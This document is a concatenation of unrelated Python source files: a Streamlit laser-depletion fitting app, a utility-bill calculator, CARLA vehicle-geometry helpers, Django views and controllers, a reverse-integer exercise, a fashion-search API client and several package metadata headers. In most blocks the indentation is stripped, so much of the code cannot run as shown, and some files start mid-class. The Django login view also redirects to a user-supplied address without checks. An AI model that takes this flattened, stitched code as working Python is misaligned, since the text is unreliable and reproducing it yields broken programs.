st.title("Choose proper ResOn and ResOff file from the sidebar")
st.subheader("Error details")
st.write(error)
def initialise(self):
        self.method = st.sidebar.selectbox("Method", ("Power dependence", "Time dependence"))
pwidget = st.sidebar.empty()
scanfiles = list(self.location.glob("*.scan"))
scanfiles = [i.name for i in scanfiles]
if st.sidebar.button("Refresh"):
scanfiles = list(self.location.glob("*.scan"))
scanfiles = [i.name for i in scanfiles]
self.resON_select = st.sidebar.selectbox("Res ON:", scanfiles)
self.resOFF_select = st.sidebar.selectbox("Res OFF:", scanfiles)
self.resOnFile = self.location/self.resON_select
self.resOffFile = self.location/self.resOFF_select
self.nshots = st.sidebar.radio("FELIX (Hz)", (10, 5))
self.massIndex = st.sidebar.number_input("MassIndex", 0, value=1)
self.timeStart = st.sidebar.number_input("TimeStartIndex", 0, value=1)
if self.method == "Power dependence":
powerWidget = pwidget.text_input("Power (ON, OFF)", "12, 12")
            power_values = np.asarray(powerWidget.split(","), dtype=float)
self.powerOn = power_values[0]
self.powerOff = power_values[1]
self.power = {"resOn": power_values[0]/1000, "resOff": power_values[1]/1000} # mJ to J
self.xaxis_title = "n*t*E (J)"
else:
self.powerOn = "-"
self.powerOff = "-"
self.power = {"resOn": 1, "resOff": 1}
self.nshots = 1
self.xaxis_title = "Time (s)"
def make_slider(self, Koff, Kon, N, Na0, Nn0):
        self.koff_slider = st.sidebar.slider("Koff", 0.0, float(Koff*10), float(Koff))
        self.kon_slider = st.sidebar.slider("Kon", 0.0, float(Kon*10), float(Kon))
        self.n_slider = st.sidebar.slider("N", 0.0, float(N*10), float(N))
        self.na_slider = st.sidebar.slider("Na0", 0.0, float(Na0*10), float(Na0))
        self.nn_slider = st.sidebar.slider("Nn0", 0.0, float(Nn0*10), float(Nn0))
def runFit(self, Koff, Kon, N, Na0, Nn0, plot=True):
uKoff = uf(Koff, self.Koff_err)
uN = uf(N, self.N_err)
uNa0 = uf(Na0, self.Na0_err)
uNn0 = uf(Nn0, self.Nn0_err)
uKon = uf(Kon, self.Kon_err)
lg1 = f"Kon: {uKon:.2uP}, Na: {uNa0:.2uP}, Nn: {uNn0:.2uP}"
lg2 = f"Koff: {uKoff:.2uP}, N: {uN:.2uP}"
self.get_depletion_fit(Koff, N, uKoff, uN, Na0, Nn0, Kon, uNa0, uNn0, uKon, plot)
self.get_relative_abundance_fit(plot)
self.fig.update_layout(title_text=f"ON: {self.resOnFile.stem}[{self.powerOn}mJ], OFF: {self.resOffFile.stem}[{self.powerOff}mJ];\
A: {self.uA*100:.2uP}%; [Kon: {uKon:.2uP}, Koff: {uKoff:.2uP}]")
def get_timescan_data(self):
self.data1 = {"resOn":{}, "resOff": {}}
self.time = {"resOn":[], "resOff": []}
self.counts = {"resOn":[], "resOff": []}
self.error = {"resOn":[], "resOff": []}
self.ax0_plot = {}
for index, scanfile, i in zip(["resOn", "resOff"], [self.resOnFile, self.resOffFile], [0, 2]):
time, counts, error, self.mass, self.t_res, self.t_b0 = timescanplot(scanfile).get_data()
time = time/1000 # ms to s
self.time[index] = np.array(time[self.timeStart:])
self.counts[index] = np.array(counts[self.massIndex][self.timeStart:])
self.error[index] = np.array(error[self.massIndex][self.timeStart:])
self.power[index] = np.array((self.power[index] * self.nshots * self.time[index]))
# self.ax0.errorbar(self.power[index], self.counts[index], yerr=self.error[index], fmt=f"C{i}.")
error_data = dict(type="data", array=self.error[index], visible=True)
trace = go.Scatter(x=self.power[index], y=self.counts[index], error_y=error_data, name=index, mode="markers", marker=dict(color=f"rgb{colors[i]}"))
self.fig.add_trace(trace, row=1, col=1)
def N_OFF(self, x, K_OFF, N): return (N)*np.exp(-K_OFF*x)
def resOff_fit(self, auto_plot=True):
K_OFF_init = 0
N_init = self.counts["resOff"].max()
pop_off, popc_off = curve_fit(
self.N_OFF, self.power["resOff"], self.counts["resOff"],
sigma=self.error["resOff"],
absolute_sigma=True,
p0=[K_OFF_init, N_init],
bounds=[(-np.inf, 0), (np.inf, N_init*2)]
)
perr_off = np.sqrt(np.diag(popc_off))
Koff, N= pop_off
self.Koff_err, self.N_err= perr_off
if auto_plot: return Koff, N
def N_ON(self, x, Na0, Nn0, K_ON):
K_OFF = self.Koff
return Na0*np.exp(-K_ON*x)*np.exp(-K_OFF*x) + Nn0*np.exp(-K_OFF*x)
def resOn_fit(self, Koff, N, auto_plot=True):
self.Koff = Koff
Na0_init, Nn0_init, K_ON_init = N, N/2, 0
pop_on, popc_on = curve_fit(
self.N_ON, self.power["resOn"], self.counts["resOn"],
sigma=self.error["resOn"],
absolute_sigma=True,
p0=[Na0_init, Nn0_init, K_ON_init],
bounds=[(0, 0, -np.inf), (N , N*2, np.inf)]
)
perr_on = np.sqrt(np.diag(popc_on))
Na0, Nn0, Kon = pop_on
self.Na0_err, self.Nn0_err, self.Kon_err = perr_on
if auto_plot: return Na0, Nn0, Kon
def uN_OFF(self, x, uN, uK_OFF): return uN*unp.exp(-uK_OFF*x)
def uN_ON(self, x, uNa0, uNn0, uK_OFF, uK_ON): return uNa0 * \
unp.exp(-uK_ON*x)*unp.exp(-uK_OFF*x) + uNn0*unp.exp(-uK_OFF*x)
def get_depletion_fit(self, Koff, N, uKoff, uN, Na0, Nn0, Kon, uNa0, uNn0, uKon, plot=True):
self.Kon = Kon
self.Koff = Koff
maxPower = np.append(self.power["resOn"], self.power["resOff"]).max()*2
self.fitX = np.linspace(0, maxPower, 20)
ufitX = unp.uarray(self.fitX, np.zeros(len(self.fitX)))
self.fitOn = self.N_ON(self.fitX, Na0, Nn0, self.Kon)
self.fitOff = self.N_OFF(self.fitX, Koff, N)
self.fitOn_with_err = self.uN_ON(ufitX, uNa0, uNn0, uKoff, uKon)
self.fitOff_with_err = self.uN_OFF(ufitX, uKoff, uN)
self.fitted_counts_error = {"resOn": unp.std_devs(self.fitOn_with_err), "resOff": unp.std_devs(self.fitOff_with_err)}
print(f"Exp counts error: {self.error}\nFitted counts error: {self.fitted_counts_error}\n")
self.fitted_counts = {"resOn":np.array(self.fitOn), "resOff": np.array(self.fitOff)}
print(f"Counts: {self.counts}\nFitted: {self.fitted_counts}\n")
if plot:
for index, fitY, i in zip(["resOn", "resOff"], [self.fitOn, self.fitOff], [0, 2]):
trace = go.Scatter(x=self.fitX, y=fitY, mode="lines", marker=dict(color=f"rgb{colors[i]}"), showlegend=False)
self.fig.add_trace(trace, row=1, col=1)
lg1 = f"Kon: {uKon:.2uP}, Na: {uNa0:.2uP}, Nn: {uNn0:.2uP}"
lg2 = f"Koff: {uKoff:.2uP}, N: {uN:.2uP}"
st.subheader(lg1)
st.subheader(lg2)
def Depletion(self, x, A):
K_ON = self.Kon
return A*(1-np.exp(-K_ON*x))
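    # Model summary, as encoded by the fit functions above:
    #   off-resonance:  N_off(x) = N * exp(-Koff * x)
    #   on-resonance:   N_on(x)  = Na0 * exp(-(Kon + Koff) * x) + Nn0 * exp(-Koff * x)
    #   depletion:      D(x)     = A * (1 - exp(-Kon * x)),  A = active-isomer fraction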
def get_relative_abundance_fit(self, plot=True):
self.depletion_fitted = 1 - (self.fitted_counts["resOn"]/self.fitted_counts["resOff"])
depletion_fitted_with_err = 1 - (unp.uarray(self.fitted_counts["resOn"], self.fitted_counts_error["resOn"])/unp.uarray(self.fitted_counts["resOff"], self.fitted_counts_error["resOff"]))
self.depletion_fitted_err = unp.std_devs(depletion_fitted_with_err)
self.depletion_exp = 1 - (self.counts["resOn"]/self.counts["resOff"])
depletion_exp_with_err = 1 - (unp.uarray(self.counts["resOn"], self.error["resOn"])/unp.uarray(self.counts["resOff"], self.error["resOff"]))
self.depletion_exp_err = unp.std_devs(depletion_exp_with_err)
A_init = 0.5
pop_depletion, popc_depletion = curve_fit(
self.Depletion, self.fitX, self.depletion_fitted,
sigma=self.depletion_fitted_err,
absolute_sigma=True,
p0=[A_init],
bounds=[(0), (1)]
)
perr_depletion = np.sqrt(np.diag(popc_depletion))
        A = pop_depletion[0]
        A_err = perr_depletion[0]
        self.uA = uf(A, A_err)
print(f"A: {self.uA:.3uP}")
self.relative_abundance = self.Depletion(self.fitX, A)
if plot:
error_data = dict(type="data", array=self.depletion_exp_err, visible=True)
            trace1 = go.Scatter(x=self.power["resOn"], y=self.depletion_exp, mode="markers", marker=dict(color="black"), name="Exp", error_y=error_data)
trace2 = go.Scatter(x=self.fitX, y=self.depletion_fitted, mode="lines+markers", marker=dict(color=f"rgb{colors[0]}"), name="Fitted")
trace3 = go.Scatter(x=self.fitX, y=self.relative_abundance, mode="lines+markers", marker=dict(color=f"rgb{colors[2]}"), name="Relative")
self.fig.add_trace(trace1, row=1, col=2)
self.fig.add_trace(trace2, row=1, col=2)
self.fig.add_trace(trace3, row=1, col=2)
st.subheader(f"Relative abundance: {self.uA*100:.3uP} %")
if __name__ == "__main__":
args = sys.argv[1:]
location = args[0]
scanfiles = args[1:]
if location == "undefined":
st.title("Location is undefined. Please close this and browse location containing timescan files")
elif len(scanfiles)<1: st.title("This location doesn't have any timescan files")
else:
if st.checkbox("Graph is not properly scaled ?"): st.title("Click top right corner: Settings --> Show app in wide mode")
        depletionplot(location)
|
#!/usr/bin/env python3
# file: utility_cost_calc.py
"""
Reads a csv file containing meter readings.
The name of the csv file can be provided as a parameter.
If no parameter is provided, 'readings.csv' is the default.
Returns a report to standard output.
Typical usage:
./utility_cost_calc.py [input.csv] >> statement.txt
The input file must be of a format shown in accompanying csv files.
See README.rst for details.
Released under the GNU General Public License of your choosing.
©Alex Kleider [email protected]
"""
import sys
import csv
import datetime
readings_file = "readings.csv"
DEFAULT_CURRENCY_SIGN = '$'
# Re: Propane
propane_info = """
Meter reads in cubic feet.
From:
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj9xIeC-83LAhUG92MKHWOEBBIQFggdMAA&url=http%3A%2F%2Fwww.edcgov.us%2FGovernment%2FAg%2FPropane_Conversion_Chart.aspx&usg=AFQjCNFSq8UUvwTExkGq_4SSyQmdszDKbA&sig2=3z3bhV6tNB_VVqRHZZGBrw
"""
gal_in_cu_ft = 0.0278 # Convert propane from cu ft to gallons.
def get_propane_cost(prev_reading, cur_reading, cost):
return cost * gal_in_cu_ft * (cur_reading - prev_reading)
# Re: Electricity
pge_info = """From:
http://www.pge.com/tariffs/tm2/pdf/ELEC_SCHEDS_E-1.pdf
'Basic' (E6/E1) usage in kWh/day is:
"""
old_rates = """
summer_base = 7.0 #| 'Basic' (E6/E1)
winter_base = 8.5 #| usage in kWh/day.
winter_months = [11, 12, 1, 2, 3,4]
"""
new_rates = """
See accompanying file "calculations" for new rates
as of before November 2019.
tier1_price = 0.18212
tier2_price = 0.25444
tier3_price = 0.37442
"""
summer_base = 6.8 #| 'Basic' (E6/E1)
winter_base = 8.2 #| usage in kWh/day.
winter_months = [10, 11, 12, 1, 2, 3, 4, 5]
tier1_price = 0.22981
tier2_price = 0.28920
tier3_price = 0.50667
month_lengths = {2: 28, 1: 31, #| Additional code
4: 30, 3: 31, #| accounts for
6: 30, 5: 31, #| length of February
9: 30, 7: 31, #| i.e. the leap yr
11: 30, 8: 31, #| algorithm:
10: 31,12: 31} #| days_in_february().
test_data = (
("2016-03-19","2016-04-16", 238.0),
("2016-04-16","2016-05-16", 231.0),
("2016-12-16","2017-01-14", 246.5),
("2016-03-04","2016-03-26", 187.0),
("2016-03-04","2016-02-01", None),
("2016-12-31","2017-02-01", 272.0),
)
def days_in_february(year):
"""
Returns 29 if leap year, else 28.
Assumes the year will NOT be less than 2000.
If <2000 or uninterpretable as a year,
returns None after printing a warning.
"""
try:
yr = int(year)
except ValueError:
print("Bad input for a year.")
return
if yr < 2000:
print("Probably an invalid year.")
return
if yr%400==0: return 29 # Divisible by 400: Leap year 2000
if yr%100==0: return 28 # Divisible by 100: ! leap year 2100
if yr%4==0: return 29 # Divisible by 4 : Leap year 2008
else: return 28 # ! divisible by 4: ! leap year 2009
def daysafter(date):
"""
Returns days remaining in the month
_after_ the date specified. Accounts for leap years.
"""
if date.month == 2:
return days_in_february(date.year) - date.day
return month_lengths[date.month] - date.day
def daysupto(date):
"""
Returns the number of days in the month
up to and including the day specified.
"""
return date.day
def base_usage(month, days):
"""
Returns the base usage earned
by the given number of days in the given month.
A helper function for the next two functions.
"""
if month in winter_months:
return winter_base * days
else:
return summer_base * days
def base_usage_after(date):
"""
Returns usage earned by the days after
the specified day in the specified month.
"""
return base_usage(date.month,
daysafter(date))
def base_usage_upto(date):
"""
Returns the usage earned by the days up to
and including the day in the month specified by date.
"""
return base_usage(date.month,
daysupto(date))
def get_base_usage(date1, date2):
"""
Returns the base usage earned by the interval
after the first and up to and including
the second of the dates specified.
If date2 is before or the same as date1, an
announcement is printed and None is returned.
"""
if (date2 - date1).days < 1:
print("Check your input!!")
return
if ((date2.month == date1.month)
and (date2.year == date1.year)):
return base_usage(date2.month,
date2.day - date1.day)
ret = base_usage_after(date1) + base_usage_upto(date2)
month = date1.month + 1
year = date1.year
if month == 13:
month = 1
year = year + 1
while ((date2.year >= year)
and (date2.month > month)):
if month == 2: month_length = days_in_february(year)
else: month_length = month_lengths[month]
if month in winter_months:
ret += winter_base * month_length
else:
ret += summer_base * month_length
month += 1
if month == 13:
month = 1
year += 1
# print("get_base_usage is returning '{}'.".format(ret))
return ret
def get_date(s):
"""
Returns a datetime.Date object
based on the string provided which must be
of the format YYYY-MM-DD (all are integers.)
If interpretation of the string fails, an
announcement is printed and None is returned.
"""
t = s.split('-')
try:
year = int(t[0])
month = int(t[1])
day = int(t[2])
except ValueError:
print("Unable to create a date from string provided.")
return
return datetime.date(year, month, day)
def get_pge_cost(kwh_used, base):
"""
Returns the cost of the kwh_used
Requires the base usage for its calculations.
Provides closure around the tier pricing.
"""
if kwh_used > (base * 2):
return ((kwh_used - 2 * base) * tier3_price
+ base * tier2_price
+ base * tier1_price )
elif kwh_used > base:
return (( kwh_used - base) * tier2_price
+ base * tier1_price )
else:
return kwh_used * tier1_price
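# Worked example of the tier pricing above (numbers assumed for
# illustration): with base = 300 kWh and kwh_used = 700,
#   tier1: 300 * 0.22981 = 68.94
#   tier2: 300 * 0.28920 = 86.76
#   tier3: (700 - 600) * 0.50667 = 50.67
#   total ~= $206.37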
def get_readings(readings_file):
"""
Returns a string showing content of the CSV input file.
"""
# print("Opening {}".format(readings_file))
with open(readings_file) as csvfile:
reader = csv.DictReader(csvfile)
# print(reader.fieldnames)
ret = ["""\nReading the Following Raw Data from: {}\n
Date cuft kWh Price/gal Paid Comments
---------- ------ ----- --------- ------- --------------- """
.format(readings_file)]
for row in reader:
line2add = (
"{Date} {cu_ft:>8}{kwh:>7}{propane_cost_per_gal:>10} {paid:>9} {comment}"
.format(**row))
ret.append(line2add)
# print("Appending: '{}'".format(line2add))
# .format(row['Date'], row['cu_ft'],
# row['current price of propane/gal'] ,row['kwh'],
# row['paid'], row['comment']))
return '\n'.join(ret)
def testing():
"""
A little test routine.
It can be made into a unit test in a future version.
"""
prev_date = datetime.date(2016,4,16)
cur_date = datetime.date(2016,5,23)
print(cur_date)
delta = cur_date - prev_date
print("delta days => {}.".format(delta.days))
print("Printing daysupto: {}.".format(daysupto(cur_date)))
print("base usage up to: {}.".format(base_usage_upto(cur_date)))
print("Printing days after: {}".format(daysafter(prev_date)))
print("base usage after: {}.".format(base_usage_after(prev_date)))
print("get_base_usage => {}."
.format(get_base_usage(prev_date, cur_date)))
print("=========================")
for prev, cur, result in test_data:
prev_date = get_date(prev)
cur_date = get_date(cur)
print(prev_date, cur_date)
print(get_base_usage(prev_date, cur_date), result)
print()
print("Expect 28 x 6:")
for year in (2009, 2010, 2011, 1800, 1900, 2100):
print(days_in_february(year))
print("Expect 29 x 5:")
for year in (2008, 2012, 2016, 2000, 2400):
print(days_in_february(year))
kwh_used = 60063 - 59708
date1 = "2016-04-16"
date2 = "2016-05-23"
owing = get_pge_cost(kwh_used, get_base_usage(
get_date(date1), get_date(date2)))
print("Calculated cost is ${:0.2f}".format(owing))
def normalizeValue(val):
"""
Normalizes currency values.
Provides for parens as an alternative to minus
and eliminates currency sign if present.
If both are used, the currency sign is expected
to be with in the parens.
"""
if val.startswith('(') and val.endswith(')'):
val = '-' + val[1:-1]
return val.replace(DEFAULT_CURRENCY_SIGN,'')
def get_report(readings_file):
"""
Prepares a report and returns it as a string.
Report includes starting and ending readings,
amount consumed and cost of each utility,
as well as the total, how much if any was paid,
and the amount outstanding.
"""
with open(readings_file) as csvfile:
reader = csv.DictReader(csvfile)
report = ["\n\nUTILITIES REPORT (Based on the above.)\n"]
report.append(
"""{}
{:<12} cuft Cost
{:<12} kWh Cost
{} | {} | {}\n"""
.format(
"Date Range", "Propane", "Electricity", "Total", "Paid", "Owing"))
row_number = 0
owing = 0
for row in reader:
row_number += 1
if row_number == 1:
cur_date = row['Date']
cur_gas = float(row['cu_ft'])
cur_kwh = float(row['kwh'])
continue
else:
prev_date = cur_date
prev_gas = float(cur_gas)
prev_kwh = float(cur_kwh)
cur_date = row['Date']
cur_gas = float(row['cu_ft'])
cur_kwh = float(row['kwh'])
gas_price = float(normalizeValue(
row['propane_cost_per_gal']))
paid = float(normalizeValue(row['paid']))
comment = row['comment']
cost_of_propane = get_propane_cost(
prev_gas, cur_gas, gas_price)
cost_of_electricity = get_pge_cost(
cur_kwh - prev_kwh,
get_base_usage(get_date(prev_date),
get_date(cur_date)))
total_cost = cost_of_propane + cost_of_electricity
owing += (total_cost - paid)
report.append(
"""from {} to {}
{} - {} = {:0.1f} ${:0.2f}
{} - {} = {:0.1f} ${:0.2f}
${:0.2f} | ${:0.2f} | ${:0.2f}\n""".format(prev_date, cur_date,
cur_gas, prev_gas, cur_gas - prev_gas, cost_of_propane,
cur_kwh, prev_kwh, cur_kwh - prev_kwh, cost_of_electricity,
total_cost, paid, owing) )
report.append("""
Amount owed at time of program run: ${:0.2f}.
(The last dollar amount given above.)
""".format(owing))
return "\n".join(report)
if __name__ == "__main__":
args = sys.argv
if len(args)>1:
readings_file = args[1]
print(get_readings(readings_file))
    print()
print(get_report(readings_file))
|
import numpy as np
def get_leading_vehicle_unsafe(vehicle, vehicles, reference_waypoints, max_distance):
"""
Get leading vehicle wrt reference_waypoints or global_path.
!warning: distances between reference_waypoints cannot exceed any vehicle length.
Args:
reference_waypoints: list of carla.Waypoint
    Returns:
        (leading_vehicle, leading_distance)
    """
current_location = vehicle.get_location()
vehicle_id = vehicle.id
vehicle_half_height = vehicle.bounding_box.extent.z
func = lambda loc: loc.distance(current_location)
obstacles = [(func(o.get_location()), o) for o in vehicles if o.id != vehicle_id and func(o.get_location()) <= 1.001*max_distance]
sorted_obstacles = sorted(obstacles, key=lambda x:x[0])
leading_vehicle, leading_distance = None, 0.0
for i, waypoint in enumerate(reference_waypoints):
if i > 0: leading_distance += waypoint.transform.location.distance(reference_waypoints[i-1].transform.location)
if leading_distance > 1.001*max_distance: break
location = waypoint.transform.location
location.z += vehicle_half_height
for _, obstacle in sorted_obstacles:
obstacle_transform = obstacle.get_transform()
if obstacle.bounding_box.contains(location, obstacle_transform):
leading_vehicle = obstacle
longitudinal_e, _, _ = error_transform(obstacle_transform, waypoint.transform)
leading_distance += longitudinal_e
break
if leading_vehicle is not None: break
return leading_vehicle, leading_distance
def error_transform(current_transform, target_transform):
xr, yr, thetar = target_transform.location.x, target_transform.location.y, np.deg2rad(target_transform.rotation.yaw)
theta_e = pi2pi(np.deg2rad(current_transform.rotation.yaw) - thetar)
d = (current_transform.location.x - xr, current_transform.location.y - yr)
t = (np.cos(thetar), np.sin(thetar))
longitudinal_e, lateral_e = _cal_long_lat_error(d, t)
return longitudinal_e, lateral_e, theta_e
def _cal_long_lat_error(d, t):
'''
Args:
d, t: array-like
'''
dx, dy = d[0], d[1]
tx, ty = t[0], t[1]
longitudinal_e = dx*tx + dy*ty
lateral_e = dx*ty - dy*tx
return longitudinal_e, lateral_e
def pi2pi(theta):
return (theta + np.pi) % (2 * np.pi) - np.pi
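# Geometry note: with d the position error and t the unit tangent of the
# target pose, longitudinal_e = d.t (projection along the path) and
# lateral_e = d x t (signed z-component of the cross product, the side offset);
# pi2pi wraps an angle into [-pi, pi).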
|
from ..serializers import TiempoUnidadSerializer
from ..models import Tiempo_Unidad
class ControllerTiempoUnidad:
def creartiempounidad(request):
datostimpounidad = request.data
try:
tiempoUnidadNuevo = Tiempo_Unidad.objects.create(
unidad_es = datostimpounidad['unidad_es'],
unidad_en = datostimpounidad['unidad_en']
)
except Exception:
return {"estatus":"Error"}
return {"estatus":"Ok", 'tiempo_unidad': tiempoUnidadNuevo.unidad_es}
def listartiempounidad(id_tiempo_unidad=None):
if id_tiempo_unidad:
try:
queryset = Tiempo_Unidad.objects.get(id_tiempo_unidad=id_tiempo_unidad)
except Tiempo_Unidad.DoesNotExist:
                return ({'result': 'The requested time unit was not found'})
serializer = TiempoUnidadSerializer(queryset)
return serializer.data
else:
queryset = Tiempo_Unidad.objects.all()
serializer = TiempoUnidadSerializer(queryset, many=True)
            return serializer.data
|
import sys
def solve(x):
    isNegative = x < 0
    r = int(str(abs(x))[::-1])
    if isNegative:
        r = -r
    # Clamp to the signed 32-bit range, per the classic reverse-integer problem.
    return r if -2**31 <= r <= 2**31 - 1 else 0
if __name__ == '__main__':
# sys.stdin = open('./input.txt')
# n = int(input())
# arr = [int(x) for x in input().split()]
x = int(input())
result = solve(x)
print(result)
|
from setuptools import setup, find_packages
setup(name='python-markdown-generator',
version='0.1',
description='Python library for dynamically generating HTML sanitized Markdown syntax.',
long_description=open('README.md').read(),
url='https://github.com/Nicceboy/python-markdown-generator',
author='Niklas Saari',
author_email='[email protected]',
license='Apache-2.0',
packages=find_packages(),
      zip_safe=False)
|
#coding=utf-8
from comb import *
import re
m = PyMouse()
k = PyKeyboard()
def keyboard(command):
if command == "j":
k.press_key("j")
time.sleep(0.1)
k.release_key("j")
elif command == "k":
k.tap_key("k")
elif command =="jk":
k.press_keys(["j","k"])
elif command == "kl":
k.tap_key("kl")
elif command == "jjj":
k.press_key("a")
def msg_handler(msg):
    print(msg)
    actions = re.split(",|，", msg)
for action in actions:
commands = action.split("+")
if len(commands)>0:
if len(commands)==2 and commands[0] in ["star1","star2","star3","star4","star5","star6","combo1","combo2"]:
combo.combo_handler(commands)
else:
action_control.action_handler(commands)
def restart():
k.tap_key(k.alt_l_key)
k.tap_key("f")
k.tap_key(k.down_key,5)
k.tap_key(k.enter_key)
|
# -*- coding: utf-8 -*-
from django.contrib.auth import login as auth_login
from django.contrib.auth import authenticate
from django.shortcuts import render
from django.http.response import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.models import User
from myAPI.checkcode import gcheckcode
# http://localhost:9000/home/myregister/
def myregister(request):
path = 'home/myregister.html'
g_checkcode = gcheckcode(request)
if request.method != 'POST':
return render(request, path, context=locals())
name = request.POST['username']
isname = User.objects.filter(username = name)
if isname:
        messages.info(request, name + u' is already registered!')
return HttpResponseRedirect('#')
email = request.POST['email']
password = request.POST['password']
if not name or not email or not password:
        messages.info(request, 'err: username, email, and password are all required!')
return HttpResponseRedirect('#')
user = User.objects.create_user(name, email, password)
user.is_staff = False
user.is_superuser = False
user.save()
auth_login(request, user)
return HttpResponseRedirect('/')
# http://localhost:9000/home/mylogin/
def mylogin(request):
if request.method != 'POST':
return render(request, 'home/mylogin.html', context=locals())
username = request.POST['username']
password = request.POST['password']
href = request.POST['href']
if href == '': href = '/'
user = authenticate(username=username, password=password)
if user:
        auth_login(request, user)  # when a local name `login` exists, auth_login must be used
return HttpResponseRedirect(href)
    messages.info(request, u'Login failed! Please enter a correct username and password. Note that both are case-sensitive!')
return render(request, 'home/mylogin.html', context=locals())
|
""" Natural Language Search APIs.
https://cognitivefashion.github.io/slate/#natural-language-search
"""
__author__ = "Vikas Raykar"
__email__ = "[email protected]"
__copyright__ = "IBM India Pvt. Ltd."
__all__ = ["NaturalLanguageSearch"]
import os
import json
import requests
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
class NaturalLanguageSearch():
""" Natural Language Search APIs.
"""
def __init__(self,
api_gateway_url,
api_key,
version='v1',
data_collection_opt_out=False):
""" Initialization.
Parameters
----------
api_gateway_url : str
The api gateway url.
api_key : str
The api key.
version : str, optional (default: 'v1')
The api version.
data_collection_opt_out : boolean, optional (default: False)
https://cognitivefashion.github.io/slate/#data-collection
"""
self.api_gateway_url = api_gateway_url
self.version = version
self.api_key = api_key
self.headers = {}
self.headers['X-Api-Key'] = self.api_key
self.headers['X-Data-Collection-Opt-Out'] = str(data_collection_opt_out).lower()
#--------------------------------------------------------------------------
# Get a random fashion quote.
# GET /v1/fashion_quote
#--------------------------------------------------------------------------
def fashion_quote(self):
""" Get a random fashion quote.
https://cognitivefashion.github.io/slate/#fashion-quote
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params = {}
api_endpoint = '%s/fashion_quote'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Natural Language Semantic Search
# GET /v1/catalog/{catalog_name}/natural_language_search
# params : (required) query_text
# max_number_of_results
# max_number_of_backoffs
# return_elasticsearch_queries
#--------------------------------------------------------------------------
def natural_language_search(self,catalog_name,query_text,
max_number_of_results=12,
max_number_of_backoffs=5,
return_elasticsearch_queries=False):
""" Natural Language Semantic Search
https://cognitivefashion.github.io/slate/#natural-language-search28
Parameters
----------
catalog_name : str
the catalog name
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
max_number_of_results : int, optional(default:12)
maximum number of results to return
max_number_of_backoffs : int, optional(default:5)
maximum number of backoffs
Set to 0 if you want only one query.
return_elasticsearch_queries : str, optional(default:false)
If true returns the corresponding elasticsearch queries
(ordered from specific to general) in the query DSL format.
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['max_number_of_results'] = max_number_of_results
params['max_number_of_backoffs'] = max_number_of_backoffs
params['return_elasticsearch_queries'] = str(return_elasticsearch_queries).lower()
api_endpoint = '%s/catalog/%s/natural_language_search'%(self.version,
catalog_name)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Natural Language Semantic Search Elasticsearch Queries
# GET /v1/natural_language_search/elasticsearch_queries
# params : (required) query_text
# max_number_of_results
# max_number_of_backoffs
#--------------------------------------------------------------------------
def elasticsearch_queries(self,query_text,
max_number_of_results=12,
max_number_of_backoffs=5):
""" Get elasticsearch queries.
https://cognitivefashion.github.io/slate/#get-elasticsearch-queries
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
max_number_of_results : int, optional(default:12)
maximum number of results to return
max_number_of_backoffs : int, optional(default:5)
maximum number of backoffs
Set to 0 if you want only one query.
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['max_number_of_results'] = max_number_of_results
params['max_number_of_backoffs'] = max_number_of_backoffs
api_endpoint = '%s/natural_language_search/elasticsearch_queries'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Parse fashion text.
# GET /v1/natural_language_search/parse
# params : (required) query_text
# include_apparel_hyponyms
# include_apparel_hypernyms
# return_search_terms
#--------------------------------------------------------------------------
def parse(self,query_text,
include_apparel_hyponyms=False,
include_apparel_hypernyms=False,
return_search_terms=False):
""" Parse fashion text.
https://cognitivefashion.github.io/slate/#parse-fashion-query-text
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['include_apparel_hyponyms'] = str(include_apparel_hyponyms).lower()
params['include_apparel_hypernyms'] = str(include_apparel_hypernyms).lower()
params['return_search_terms'] = str(return_search_terms).lower()
api_endpoint = '%s/natural_language_search/parse'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Spelling Correction.
# GET /v1/natural_language_search/spell_correct
# params : (required) query_text
#--------------------------------------------------------------------------
def spell_correct(self,query_text):
""" Parse fashion text.
https://cognitivefashion.github.io/slate/#spelling-correction
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
api_endpoint = '%s/natural_language_search/spell_correct'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
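# Minimal usage sketch (hypothetical gateway URL, API key and catalog name):
# nls = NaturalLanguageSearch("https://api.example.com/", "my-api-key")
# status, quote = nls.fashion_quote()
# status, results = nls.natural_language_search(
#     "my_catalog", "show me some red graphic print tees under 1k.")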
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
__title__ = "eeprivacy"
__description__ = "Energy Differential Privacy"
__url__ = "http://github.com/recurve-inc/eeprivacy"
__version__ = "0.0.5"
__author__ = "Marc Paré"
__author_email__ = "[email protected]"
|
"""
Goal: store utility functions
@authors:
Andrei Sura <[email protected]>
"""
import sys
import uuid
import logging
import unicodedata
from binascii import unhexlify
from itertools import zip_longest, islice, chain
from hashlib import sha256
from datetime import datetime
from datetime import date
import sqlalchemy as db
log = logging.getLogger(__package__)
# FORMAT_US_DATE = "%x"
# FORMAT_US_DATE_TIME = '%x %X'
FORMAT_DATABASE_DATE = "%Y-%m-%d"
